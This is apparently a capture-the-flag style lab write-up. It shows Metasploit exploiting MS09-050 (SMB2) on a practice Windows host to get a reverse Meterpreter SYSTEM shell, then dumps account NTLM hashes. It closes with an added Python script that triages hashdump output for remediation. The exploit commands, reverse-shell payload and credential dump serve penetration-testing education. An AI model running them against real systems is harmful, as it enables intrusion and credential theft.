MS09-050


The target system was identified as vulnerable to MS09-050, the SRV2.SYS SMB2 negotiate function table dereference, so the corresponding Metasploit module is located first.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/internal_offsec]
└─$ msfconsole -q                                                                     
[*] Starting persistent handler(s)...
msf6 > search MS09-050
 
Matching Modules
================
 
   #  Name                                                       Disclosure Date  Rank    Check  Description
   -  ----                                                       ---------------  ----    -----  -----------
   0  exploit/windows/smb/ms09_050_smb2_negotiate_func_index     2009-09-07       good    No     MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   1  auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh  .                normal  No     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   2  auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff     .                normal  No     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
 
 
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
 
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Using Metasploit

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.45.218
LHOST => 192.168.45.218
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOSTS 192.168.136.40
RHOSTS => 192.168.136.40

Setting the target (RHOSTS) and the listening host for the reverse payload (LHOST)

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.45.218:4444 
[*] 192.168.136.40:445 - Connecting to the target (192.168.136.40:445)...
[*] 192.168.136.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.136.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (177734 bytes) to 192.168.136.40
[*] Meterpreter session 1 opened (192.168.45.218:4444 -> 192.168.136.40:49159) at 2025-03-07 21:24:01 +0100
 
meterpreter > shell
Process 1584 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
internal
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.136.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.136.254
 
Tunnel adapter Local Area Connection*:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 9:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Initial foothold established on the target as NT AUTHORITY\SYSTEM by exploiting MS09-050: a full system-level compromise on the host "internal" (192.168.136.40).

Hashdump


meterpreter > hashdump
aaron:1002:aad3b435b51404eeaad3b435b51404ee:505a9279cfd2f94c658980551cfde735:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:848c583ff88fae9eb8c40e05e3bed204:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jack:1003:aad3b435b51404eeaad3b435b51404ee:e24106942bf38bcf57a6a4b29016eff6:::
niky:1000:aad3b435b51404eeaad3b435b51404ee:e99eaad9ebc48c3bd0c9734d0c6d106b:::
tim:1001:aad3b435b51404eeaad3b435b51404ee:4c67a94ab3de7684d00a941fae71f966:::
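As an added example that is not part of this writeup, the script below triages hashdump output of the kind shown above from a remediation standpoint: it parses the pwdump format (user:RID:LM:NT:::), recognises the well-known hashes of an empty LM and empty NT password, and lists which accounts a report should flag (blank password, or an LM hash still being stored). The sample lines are constructed to match the format, not the real dump.

```python
"""Triage of Metasploit hashdump (pwdump-format) output for a remediation report.

Each line is  user:RID:LM_hash:NT_hash:::  (hashes are 32 hex chars).
The two constants are the well-known hashes of an empty LM and NT password.
"""
import re
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" (blank password)
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

@dataclass
class Account:
    user: str
    rid: int
    lm_stored: bool       # True if a real (crackable) LM hash is present
    blank_password: bool  # True if the NT hash is the empty-password hash
    note: str             # annotation for well-known RIDs, else ""

def parse_hashdump(text):
    """Parse pwdump lines; malformed lines are skipped rather than fatal."""
    accounts = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        accounts.append(Account(user, rid, lm != EMPTY_LM, nt == EMPTY_NT,
                                WELL_KNOWN_RIDS.get(rid, "")))
    return accounts

def findings(accounts):
    """Return (user, issue) pairs that belong in the remediation report."""
    out = []
    for a in accounts:
        if a.blank_password:
            out.append((a.user, "blank password"))
        if a.lm_stored:
            out.append((a.user, "LM hash stored"))
    return out

# Constructed sample in the writeup's output format (not the real dump);
# the non-empty hashes are arbitrary hex filler.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1004:0011223344556677889900aabbccddee:fedcba9876543210fedcba9876543210:::
garbage line that does not match
"""

if __name__ == "__main__":
    for user, issue in findings(parse_hashdump(SAMPLE)):
        print(f"{user}: {issue}")
```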